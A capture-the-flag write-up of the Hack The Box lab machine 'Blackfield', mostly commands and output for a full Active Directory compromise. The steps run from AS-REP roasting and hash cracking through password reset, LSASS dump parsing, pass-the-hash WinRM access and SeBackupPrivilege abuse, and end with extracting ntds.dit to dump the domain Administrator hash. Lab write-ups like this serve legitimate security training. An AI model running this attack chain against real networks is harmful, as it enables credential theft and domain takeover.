Post

HTB - Blackfield

HTB: Blackfield

Blackfield Box

Walkthrough Summary

StepActionToolAchieved
1SMB EnumerationNetExecObtained usernames
2ASREPRoastingGetNPUsersObtained password for support
3Domain EnumerationBloodHound.py, BloodHoundObtained credentials for audit2020
4SMB EnumerationNetExec, pypykatzObtained hash for svc_backup (initial foothold)
5Privilege Exploitationdiskshadow, robocopyExfiltrated ntds.dit & system.hive
6Hash DumpSecretsDump, NetExecCompromised domain

Attack Chain Reproduction Steps

TCP all-ports scan:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ sudo nmap 10.10.10.192 -T4 -p- -A -open

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-03-20 22:39:59Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Important things to note based on Nmap’s output:

  • Domain name: BLACKFIELD.LOCAL
  • Host name: DC01
  • WinRM available (5985)

Before proceed to enumerate the SMB and LDAP services, we should add blackfield.local & dc01.blackfield.local to our local DNS file (/etc/hosts).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# enumerating SMB shares
$ nxc smb 10.10.10.192 -u 'guest' -p '' --shares
SMB         10.10.10.192    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\guest:
SMB         10.10.10.192    445    DC01             [*] Enumerated shares
SMB         10.10.10.192    445    DC01             Share           Permissions     Remark
SMB         10.10.10.192    445    DC01             -----           -----------     ------
SMB         10.10.10.192    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.10.192    445    DC01             C$                              Default share
SMB         10.10.10.192    445    DC01             forensic                        Forensic / Audit share.
SMB         10.10.10.192    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.10.192    445    DC01             NETLOGON                        Logon server share
SMB         10.10.10.192    445    DC01             profiles$       READ
SMB         10.10.10.192    445    DC01             SYSVOL                          Logon server share

Spidering the profile$ share reveals various usernames:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ nxc smb 10.10.10.192 -u 'anonymous' -p '' --spider 'profiles$' --regex .
SMB         10.10.10.192    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\anonymous:
SMB         10.10.10.192    445    DC01             [*] Started spidering
SMB         10.10.10.192    445    DC01             [*] Spidering .
SMB         10.10.10.192    445    DC01             //10.10.10.192/profiles$/. [dir]
SMB         10.10.10.192    445    DC01             //10.10.10.192/profiles$/.. [dir]
SMB         10.10.10.192    445    DC01             //10.10.10.192/profiles$/AAlleni [dir]
SMB         10.10.10.192    445    DC01             //10.10.10.192/profiles$/ABarteski [dir]
SMB         10.10.10.192    445    DC01             //10.10.10.192/profiles$/ABekesz [dir]
<SNIP>
SMB         10.10.10.192    445    DC01             [*] Done spidering (Completed in 55.86900997161865)

# create a username list
$ nxc smb 10.10.10.192 -u 'anonymous' -p '' --spider 'profiles$' --regex . > nxc_spider.txt
$ cat nxc_spider.txt | grep '[dir]' | cut -d'/' -f5 | cut -d' ' -f1 | sort | uniq > domain_users.txt

Check for ASREPRoastable accounts:

1
2
3
4
$ getnpusers blackfield.local/ -dc-ip 10.10.10.192 -no-pass -usersfile domain_users.txt | grep 'krb5\|User'
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:9f6ca396e535881d3e763ec8b9ac02d3$5601e4935152a25b38784ffcec4dfb846fad6acd52b0337af240a62083dc59eca7344b3b4b4b6cbe5c925f4ca3378aecd925e0021b55b64590227069c7709c56494f96d7c0b4677df2cb2b99b8a4196443656485462f6feb37fdeeac1ca82eb0d381e3807ced88ca442249c21ba2e6ae354a2de9fe31f33283730232a00b62520734ec9c70b307be113472519ef94d6cd4f1d5276aaed7bcd3d9b719ea7eec729b8afa7bd71e88ca0c99837eb91bc18d4526ce67895d74a4bc61fc3ae6922c44d3213f1b56a7af8d2009e59371d1778d19ccf3be01c568a097d3545a053691af1e553bd8ed0f74d75ba63b71afb00a99678b4be9
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set

We have three valid usernames, one of which is ASREPRoastable and we can crack it hash:

1
2
3
4
5
$ hashcat -m 18200 support_hash /usr/share/wordlists/rockyou.txt

<SNIP>
$krb5asrep$23$support@BLACKFIELD.LOCAL:0fb<REDACTED>e87:#0<REDACTED>ht
<SNIP>

Now we have credentials, we can obtain group information about the other two users:

1
2
3
4
5
6
7
8
9
10
11
$ nxc ldap 10.10.10.192 -u 'support' -p '#0<REDACTED>ht' -M groupmembership -o USER=audit2020
<SNIP>
GROUPMEM... 10.10.10.192    389    DC01             [+] User: audit2020 is member of following groups:
GROUPMEM... 10.10.10.192    389    DC01             Domain Users

$ nxc ldap 10.10.10.192 -u 'support' -p '#0<REDACTED>ht' -M groupmembership -o USER=svc_backup
<SNIP>
GROUPMEM... 10.10.10.192    389    DC01             [+] User: svc_backup is member of following groups:
GROUPMEM... 10.10.10.192    389    DC01             Remote Management Users
GROUPMEM... 10.10.10.192    389    DC01             Backup Operators
GROUPMEM... 10.10.10.192    389    DC01             Domain Users

We can also collect domain information and let Bloodhound analyze it:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$ bloodhound-python -u support -p '#0<REDACTED>ht' -dc dc01.blackfield.local -c all -d BLACKFIELD.LOCAL -ns 10.10.10.192
INFO: Found AD domain: blackfield.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 316 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
<SNIP>
INFO: Querying computer: DC01.BLACKFIELD.local
WARNING: Failed to get service ticket for DC01.BLACKFIELD.local, falling back to NTLM auth
CRITICAL: CCache file is not found. Skipping...
WARNING: DCE/RPC connection failed: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Done in 00M 06S

It seems that the account support can change the password of the account audit2020:

1
2
3
4
5
6
7
# change user's password
$ net rpc password 'audit2020' 'p@ssw0rd!' -U "blackfield.local/support%#0<REDACTED>ht" -S dc01.blackfield.local

# confirm credentials
$ nxc smb 10.10.10.192 -u audit2020 -p 'p@ssw0rd!'
SMB         10.10.10.192    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:p@ssw0rd!

We can also change the user’s password using rpcclient.

Check the conent of the forensic share:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
$ nxc smb 10.10.10.192 -u audit2020 -p 'p@ssw0rd!' --share forensic -M spider_plus
SMB         10.10.10.192    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:p@ssw0rd!
SPIDER_P... 10.10.10.192    445    DC01             [*] Started module spidering_plus with the following options:
SPIDER_P... 10.10.10.192    445    DC01             [*]  DOWNLOAD_FLAG: False
SPIDER_P... 10.10.10.192    445    DC01             [*]     STATS_FLAG: True
SPIDER_P... 10.10.10.192    445    DC01             [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_P... 10.10.10.192    445    DC01             [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_P... 10.10.10.192    445    DC01             [*]  MAX_FILE_SIZE: 50 KB
SPIDER_P... 10.10.10.192    445    DC01             [*]  OUTPUT_FOLDER: /tmp/nxc_spider_plus
SMB         10.10.10.192    445    DC01             [*] Enumerated shares
SMB         10.10.10.192    445    DC01             Share           Permissions     Remark
SMB         10.10.10.192    445    DC01             -----           -----------     ------
SMB         10.10.10.192    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.10.192    445    DC01             C$                              Default share
SMB         10.10.10.192    445    DC01             forensic        READ            Forensic / Audit share.
SMB         10.10.10.192    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.10.192    445    DC01             NETLOGON        READ            Logon server share
SMB         10.10.10.192    445    DC01             profiles$       READ
SMB         10.10.10.192    445    DC01             SYSVOL          READ            Logon server share
SPIDER_P... 10.10.10.192    445    DC01             [+] Saved share-file metadata to "/tmp/nxc_spider_plus/10.10.10.192.json".
SPIDER_P... 10.10.10.192    445    DC01             [*] SMB Shares:           7 (ADMIN$, C$, forensic, IPC$, NETLOGON, profiles$, SYSVOL)
SPIDER_P... 10.10.10.192    445    DC01             [*] SMB Readable Shares:  5 (forensic, IPC$, NETLOGON, profiles$, SYSVOL)
SPIDER_P... 10.10.10.192    445    DC01             [*] SMB Filtered Shares:  1
SPIDER_P... 10.10.10.192    445    DC01             [*] Total folders found:  368
SPIDER_P... 10.10.10.192    445    DC01             [*] Total files found:    725
SPIDER_P... 10.10.10.192    445    DC01             [*] File size average:    978.9 KB
SPIDER_P... 10.10.10.192    445    DC01             [*] File size min:        0 B
SPIDER_P... 10.10.10.192    445    DC01             [*] File size max:        125.87 MB

It seems that among the files there is a LSASS memory dump which we can download locally:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# read output file
$ jq . /tmp/nxc_spider_plus/10.10.10.192.json
<SNIP>
    },
    "memory_analysis/lsass.zip": {
      "atime_epoch": "2020-05-28 21:25:08",
      "ctime_epoch": "2020-05-28 21:25:01",
      "mtime_epoch": "2020-05-28 21:29:24",
      "size": "39.99 MB"
    },
<SNIP>

# download file
$ nxc smb 10.10.10.192 -u audit2020 -p 'p@ssw0rd!' --share forensic --get-file memory_analysis/lsass.zip lsass.zip
SMB         10.10.10.192    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:p@ssw0rd!
SMB         10.10.10.192    445    DC01             [*] Copying "memory_analysis/lsass.zip" to "lsass.zip"
SMB         10.10.10.192    445    DC01             [+] File "memory_analysis/lsass.zip" was downloaded to "lsass.zip"

We can use pypykatz to extract the data from the LSASS file:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
# unzip the lsass dump
$ unzip lsass.zip
Archive:  lsass.zip
  inflating: lsass.DMP

# extract the data
$ pypykatz lsa minidump lsass.DMP
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
<SNIP>
        == MSV ==
                Username: svc_backup
                Domain: BLACKFIELD
                LM: NA
                NT: 96<REDACTED>0d
<SNIP>
        == MSV ==
                Username: Administrator
                Domain: BLACKFIELD
                LM: NA
                NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
<SNIP>

The hash for the Administrator account does not work, but for the svc_backup account does:

1
2
3
$ nxc winrm 10.10.10.192 -u svc_backup -H 96<REDACTED>0d
SMB         10.10.10.192    445    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
WINRM       10.10.10.192    5985   DC01             [+] BLACKFIELD.local\svc_backup:96<REDACTED>0d (Pwn3d!)

Get a shell as svc_backup and compromise user.txt:

1
2
3
4
5
$ evil-winrm -i 10.10.10.192 -u svc_backup -H 96<REDACTED>0d

<SNIP>
*Evil-WinRM* PS C:\Users\svc_backup\Documents> type ..\desktop\user.txt
39<REDACTED>43

Check user’s information:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /all

<SNIP>

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
<SNIP>


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

We can exploit the SeBackupPrivilege (Windows Privilege Escalation: SeBackupPrivilege) and dump the ntds.dit database by:

  • Writing a small script for the diskshadow utility to expose the c: drive
  • Convert the script in a Windows-compatible format
  • Upload the script on the target
  • Move to a directory with write access
  • Expose the shadow copy
  • Download the ntds.dit database
1
2
3
4
5
6
7
8
9
10
# write a diskshadow script
$ cat diskshadow_script
set context persistent nowriters
add volume c: alias random
create
expose %random% z:

# convert file into a Windows-compatible format
$ sudo unix2dos diskshadow_script
unix2dos: converting file diskshadow_script to DOS format...

Next, within the WinRM session:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
# upload script
*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload diskshadow_script

Info: Uploading /home/kali/htb/ad_track/diskshadow_script to C:\Users\svc_backup\Documents\diskshadow_script

Data: 120 bytes of 120 bytes copied

Info: Upload successful!

# move within a writeable directory
*Evil-WinRM* PS C:\Windows\Temp> cd c:\windows\temp

# expose the shadow copy
*Evil-WinRM* PS C:\Windows\Temp> diskshadow /s diskshadow_script
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  3/21/2024 6:40:33 AM

-> set context persistent nowriters
-> add volume c: alias random
-> create
Alias random for shadow ID {c1b9f0fc-55fe-4df8-b9d6-cc09d5be207a} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {b33e3fe9-4ce7-481a-8ce7-968ce59f77ec} set as environment variable.

Querying all shadow copies with the shadow copy set ID {b33e3fe9-4ce7-481a-8ce7-968ce59f77ec}

        * Shadow copy ID = {c1b9f0fc-55fe-4df8-b9d6-cc09d5be207a}               %random%
                - Shadow copy set: {b33e3fe9-4ce7-481a-8ce7-968ce59f77ec}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
                - Creation time: 3/21/2024 6:40:34 AM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
                - Originating machine: DC01.BLACKFIELD.local
                - Service machine: DC01.BLACKFIELD.local
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %random% z:
-> %random% = {c1b9f0fc-55fe-4df8-b9d6-cc09d5be207a}
The shadow copy was successfully exposed as z:\.
->

# copy the ntds.dit database
*Evil-WinRM* PS C:\Windows\Temp> robocopy /b z:\windows\ntds . ntds.dit

-------------------------------------------------------------------------------
   ROBOCOPY     ::     Robust File Copy for Windows
-------------------------------------------------------------------------------

  Started : Thursday, March 21, 2024 6:44:01 AM
   Source : z:\windows\ntds\
     Dest : C:\Windows\Temp\

    Files : ntds.dit

  Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

                           1    z:\windows\ntds\
            New File              18.0 m        ntds.dit
<SNIP>
100%

------------------------------------------------------------------------------

               Total    Copied   Skipped  Mismatch    FAILED    Extras
    Dirs :         1         0         1         0         0         0
   Files :         1         1         0         0         0         0
   Bytes :   18.00 m   18.00 m         0         0         0         0
   Times :   0:00:00   0:00:00                       0:00:00   0:00:00


   Speed :           109734697 Bytes/sec.
   Speed :            6279.069 MegaBytes/min.
   Ended : Thursday, March 21, 2024 6:44:01 AM

# download the file
*Evil-WinRM* PS C:\Windows\Temp> download ntds.dit

Info: Downloading C:\Windows\Temp\ntds.dit to ntds.dit

Info: Download successful!

We also need to exfiltrate the system.hive file:

1
2
3
4
5
6
7
8
9
10
# make a copy of the file
*Evil-WinRM* PS C:\windows\temp> reg save HKlM\SYSTEM C:\windows\temp\system.hive
The operation completed successfully.

# download the file
*Evil-WinRM* PS C:\> download system.hive

Info: Downloading C:\\system.hive to system.hive

Info: Download successful!

Now the Administrator hash can be easily dumped which let us compromise the root.txt file:

1
2
3
4
5
6
7
8
9
10
11
12
13
# dump the administrator hash
$ secretsdump -ntds ntds.dit -system system.hive LOCAL | grep Admin
Administrator:500:aad3b435b51404eeaad3b435b51404ee:18<REDACTED>ee:::
Administrator:aes256-cts-hmac-sha1-96:dbd84e6cf174af55675b4927ef9127a12aade143018c78fbbe568d394188f21f
Administrator:aes128-cts-hmac-sha1-96:8148b9b39b270c22aaa74476c63ef223
Administrator:des-cbc-md5:5d25a84ac8c229c1

# compromise the root.txt file
$ nxc smb 10.10.10.192 -u administrator -H 18<REDACTED>ee -x 'type c:\users\administrator\desktop\root.txt'
SMB         10.10.10.192    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\administrator:18<REDACTED>ee (Pwn3d!)
SMB         10.10.10.192    445    DC01             [+] Executed command via wmiexec
SMB         10.10.10.192    445    DC01             43<REDACTED>cb
This post is licensed under CC BY 4.0 by the author.